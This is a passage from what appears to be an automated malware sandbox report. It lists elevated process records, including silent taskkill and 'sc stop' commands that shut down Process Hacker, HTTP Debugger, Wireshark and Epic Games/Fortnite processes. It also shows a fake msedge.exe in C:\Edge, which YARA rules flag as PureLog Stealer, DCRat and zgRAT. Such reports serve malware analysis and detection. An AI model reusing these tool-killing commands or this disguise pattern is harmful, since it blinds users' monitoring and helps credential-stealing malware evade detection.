                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:139
                                                                                                                                                                                                                                                                                    Start time:12:20:32
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:140
                                                                                                                                                                                                                                                                                    Start time:12:20:32
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:141
                                                                                                                                                                                                                                                                                    Start time:12:20:32
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:142
                                                                                                                                                                                                                                                                                    Start time:12:20:33
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:143
                                                                                                                                                                                                                                                                                    Start time:12:20:33
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:144
                                                                                                                                                                                                                                                                                    Start time:12:20:33
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:145
                                                                                                                                                                                                                                                                                    Start time:12:20:33
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:sc stop HTTPDebuggerPro
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff672820000
                                                                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:146
                                                                                                                                                                                                                                                                                    Start time:12:20:33
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:147
                                                                                                                                                                                                                                                                                    Start time:12:20:34
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:sc stop HTTPDebuggerProSdk
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff672820000
                                                                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:148
                                                                                                                                                                                                                                                                                    Start time:12:20:34
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:149
                                                                                                                                                                                                                                                                                    Start time:12:20:34
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:150
                                                                                                                                                                                                                                                                                    Start time:12:20:34
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:151
                                                                                                                                                                                                                                                                                    Start time:12:20:34
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:sc stop KProcessHacker3
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff672820000
                                                                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:152
                                                                                                                                                                                                                                                                                    Start time:12:20:34
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:153
                                                                                                                                                                                                                                                                                    Start time:12:20:34
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:sc stop KProcessHacker2
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff672820000
                                                                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:154
                                                                                                                                                                                                                                                                                    Start time:12:20:34
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:155
                                                                                                                                                                                                                                                                                    Start time:12:20:34
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
                                                                                                                                                                                                                                                                                    Imagebase:0xd70000
                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:156
                                                                                                                                                                                                                                                                                    Start time:12:20:35
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:sc stop KProcessHacker1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff672820000
                                                                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:157
                                                                                                                                                                                                                                                                                    Start time:12:20:35
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:158
                                                                                                                                                                                                                                                                                    Start time:12:20:35
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:159
                                                                                                                                                                                                                                                                                    Start time:12:20:35
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:160
                                                                                                                                                                                                                                                                                    Start time:12:20:35
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:161
                                                                                                                                                                                                                                                                                    Start time:12:20:35
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Edge/msedge.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0x5f0000
                                                                                                                                                                                                                                                                                    File size:1'963'008 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 000000A1.00000000.1655201079.00000000005F2000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 000000A1.00000002.1813420320.0000000012AC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                    • Detection: 74%, ReversingLabs
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:162
                                                                                                                                                                                                                                                                                    Start time:12:20:35
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:sc stop wireshark
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff672820000
                                                                                                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:163
                                                                                                                                                                                                                                                                                    Start time:12:20:35
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:164
                                                                                                                                                                                                                                                                                    Start time:12:20:35
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:165
                                                                                                                                                                                                                                                                                    Start time:12:20:35
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im FortniteClient-Win64-Shipping.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:166
                                                                                                                                                                                                                                                                                    Start time:12:20:35
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im HTTPDebuggerUI.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:167
                                                                                                                                                                                                                                                                                    Start time:12:20:37
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:168
                                                                                                                                                                                                                                                                                    Start time:12:20:37
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76c690000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:169
                                                                                                                                                                                                                                                                                    Start time:12:20:37
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im HTTPDebuggerSvc.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:170
                                                                                                                                                                                                                                                                                    Start time:12:20:37
                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /f /im EpicGamesLauncher.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6cc650000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:171
                                                                                                                                                                                                                                                                                    Start time:12:20:37
